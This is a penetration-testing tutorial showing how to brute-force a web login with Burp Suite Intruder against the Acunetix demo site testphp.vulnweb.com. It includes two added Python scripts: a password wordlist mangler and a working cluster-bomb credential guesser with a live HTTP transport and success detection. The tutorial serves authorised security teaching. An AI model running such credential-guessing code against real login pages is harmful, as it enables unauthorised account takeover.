Demonstrate Brute Force On Web Login Page By Using BurpSuite


The following tutorial is a beginner's guide to brute-force attacks on web login forms using Burp Suite.

In this article we demonstrate a login-page brute-force attack against the deliberately vulnerable test site “testphp.vulnweb.com”, which Acunetix runs for scanner demonstrations. Only run this against hosts you are authorised to test.

A video walkthrough is linked at the end of the tutorial.

Burp Suite: Burp Suite is a Java-based web penetration testing framework that has become an industry-standard toolkit for information security professionals. It helps you identify vulnerabilities and verify attack vectors in web applications. The module used in this tutorial is Intruder, Burp's tool for sending many variations of one request.

Burp Suite (Community or Professional edition) can be downloaded from PortSwigger.

Brute Force Attack: A brute-force attack is the simplest way to gain access to a site or server: the attacker guesses credentials by submitting candidate username/password pairs until one is accepted. Trying every possible character combination is pure brute force; trying a list of likely values, as this tutorial does, is strictly a dictionary attack, but the Burp workflow is identical.

What is a dictionary/wordlist?
A dictionary or wordlist is a list of candidate values (usernames, passwords) used as the payloads of a brute-force attack. Several tools can generate a custom wordlist for you, and Intruder can load one as a payload set.
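As an added example (not a tool from this page), the script below builds a wordlist from a few base words with the kinds of mangling rules password crackers apply: case variants, leetspeak substitutions and common suffixes. The base words, the substitution table and the suffix list are constructed for illustration; the output is deduplicated in order so it can be pasted straight into an Intruder “Simple list” payload set.

```python
"""Rule-based wordlist generation for a dictionary attack (added example)."""

# Constructed substitution table and suffix list; tune them to the target.
LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})
SUFFIXES = ["", "1", "123", "!", "2023", "2024"]


def case_variants(word):
    """Three capitalisation forms, most common first."""
    return [word.lower(), word.capitalize(), word.upper()]


def mangle(word):
    """Yield unique candidates for one base word, likeliest forms first.

    For every case variant we try the plain form and its leetspeak form,
    each with every suffix. The LEET table only maps lowercase letters,
    so an all-caps form produces no extra leet variant; dedup handles that.
    """
    seen = set()
    for base in case_variants(word):
        for form in (base, base.translate(LEET)):
            for suffix in SUFFIXES:
                cand = form + suffix
                if cand not in seen:
                    seen.add(cand)
                    yield cand


def build_wordlist(base_words, max_size=None):
    """Expand all base words into one ordered, duplicate-free list.

    max_size caps the output so an attack stays within a request budget
    (Intruder in Burp Community Edition is rate-limited, so list size matters).
    """
    out, seen = [], set()
    for word in base_words:
        for cand in mangle(word):
            if cand in seen:
                continue
            seen.add(cand)
            out.append(cand)
            if max_size is not None and len(out) >= max_size:
                return out
    return out


if __name__ == "__main__":
    # Constructed base words standing in for a short seed list.
    for candidate in build_wordlist(["test", "admin", "password"]):
        print(candidate)   # one per line, ready to paste into Intruder
```

Redirect the output to a file and load it through “Payload options” > “Load”, or paste it into the list box. Keep the base list short and target-specific (company name, product names, the default credentials the page eventually finds) rather than relying on sheer volume.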

Requirements

  • Burp Suite
  • Any browser (Chrome is used here)
  • The browser's proxy pointed at Burp's listener (127.0.0.1, port 8080 by default)
  • Target: testphp.vulnweb.com

First, make sure Burp is configured as your browser's proxy. If it is not, follow the steps below.

To configure the browser proxy for this demonstration:

Open your browser settings, type “proxy” in the search box and select “Open proxy settings” > “Connections” tab > “LAN settings” > tick “Use a proxy server for your LAN”, enter 127.0.0.1 and port 8080, then click OK. Because testphp.vulnweb.com is served over plain HTTP, Burp's CA certificate does not need to be installed for this exercise; for an HTTPS target you would also have to import it into the browser.


Now open Burp Suite.

In the Burp Proxy tab, ensure “Intercept is off” and visit the login page of the application you are testing in your browser.


Turn on Intercept


In the browser, enter any username and password (they only need to generate a login request) and submit the form; Burp intercepts the request.


Right-click the request to open the context menu and choose “Send to Intruder”.


In Intruder, select the Positions tab and follow these steps:

  • Change the attack type to “Cluster bomb” using the “Attack type” drop-down. Cluster bomb tries every combination of the two payload sets, so 100 usernames and 1,000 passwords produce 100,000 requests.
  • Clear the pre-set payload positions with the “Clear §” button to the right of the request editor, then highlight the username value and the password value in the request body and click “Add §” for each, so that exactly two positions are marked.


Go to the “Payloads” tab. In the “Payload sets” settings, ensure “Payload set” is “1” and “Payload type” is set to “Simple list”.

In “Payload options”, enter some candidate usernames, either by typing them or by loading a custom or built-in list.

Next, in “Payload sets”, change “Payload set” to “2” and, in “Payload options”, enter the candidate passwords in the same way. Position 1 (the username) draws from set 1 and position 2 (the password) from set 2.


Click the “Start attack” button.


In the “Intruder attack” window you can sort the results by clicking the column headers. Sort by “Length” and then by “Status”: every failed login returns the same error page, so a response with a different status code or body length stands out as a probable success.


The table now provides us with some interesting results for further investigation.

Viewing the response for request 6182 in the attack window shows that it is logged in as “test”.

To confirm that the brute-force attack has succeeded, log in on the web application's login page with the recovered username and password.

Alternatively, replay the exact request: copy the raw text of the successful request from the attack window, paste it into Proxy > Intercept > Raw (or send it to Repeater), and click Forward to see the logged-in response in the browser.
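As an added example, and not code from this page or from Burp, the script below does in Python what the Intruder steps above do by hand: it pairs every username with every password (the cluster-bomb attack), submits each pair as the intercepted POST, and then flags the one response whose status code and length differ from the crowd, which is what sorting the attack table by Status and Length reveals. The endpoint path and the form field names (`userinfo.php`, `uname`, `pass`) are assumptions; take the real values from the request you intercepted. The `fake_server` transport is a constructed stand-in so the script runs offline; `send_live` is the real transport for an authorised target.

```python
"""Cluster-bomb credential check with status/length outlier detection (added example)."""
import itertools
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter
from dataclasses import dataclass

# Assumed endpoint and field names; copy them from the intercepted request.
TARGET = "http://testphp.vulnweb.com/userinfo.php"
USER_FIELD, PASS_FIELD = "uname", "pass"

# Constructed payload sets standing in for Intruder payload sets 1 and 2.
USERNAMES = ["admin", "test", "guest"]
PASSWORDS = ["123456", "password", "test", "letmein"]


@dataclass
class Result:
    username: str
    password: str
    status: int
    length: int
    body: str


def build_login_request(url, username, password):
    """Build the form POST that Burp replays for one username/password pair."""
    data = urllib.parse.urlencode({USER_FIELD: username, PASS_FIELD: password}).encode()
    return urllib.request.Request(
        url, data=data, method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )


def send_live(req):
    """Real transport. urlopen raises on 4xx/5xx, so catch it and keep the body:
    an error page is still a data point for the length/status comparison."""
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode(errors="replace")


def fake_server(req):
    """Constructed stand-in for the target: only test/test is accepted."""
    fields = urllib.parse.parse_qs(req.data.decode())
    user = fields.get(USER_FIELD, [""])[0]
    password = fields.get(PASS_FIELD, [""])[0]
    if (user, password) == ("test", "test"):
        return 302, "<html>Welcome test. <a href='/logout'>Logout</a></html>"
    return 200, "<html>Invalid username or password.</html>"


def cluster_bomb(url, usernames, passwords, transport):
    """Every username x every password, one request each, in Intruder's order."""
    results = []
    for user, password in itertools.product(usernames, passwords):
        status, body = transport(build_login_request(url, user, password))
        results.append(Result(user, password, status, len(body), body))
    return results


def find_outliers(results):
    """Return results whose (status, length) is not the most common pair.

    Failures dominate any credential-guessing run, so the modal response is
    the failure baseline and anything else deserves a manual look.
    """
    counts = Counter((r.status, r.length) for r in results)
    baseline = counts.most_common(1)[0][0]
    return [r for r in results if (r.status, r.length) != baseline]


if __name__ == "__main__":
    # Swap fake_server for send_live only against a target you may test.
    for hit in find_outliers(cluster_bomb(TARGET, USERNAMES, PASSWORDS, fake_server)):
        print(f"{hit.username}:{hit.password} -> {hit.status} ({hit.length} bytes)")
```

Two caveats a practitioner should keep in mind: many applications lock the account or throttle the source after a handful of failures, so a real run needs a delay between requests and a check that the baseline response has not changed mid-attack (a lockout page is itself an “outlier”); and a single odd response proves nothing until it is replayed and the logged-in page is inspected, exactly as the tutorial does with request 6182.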


Watch Video Tutorial

Disclaimer: This tutorial is for educational purposes only.


More from Kaushal Jangid
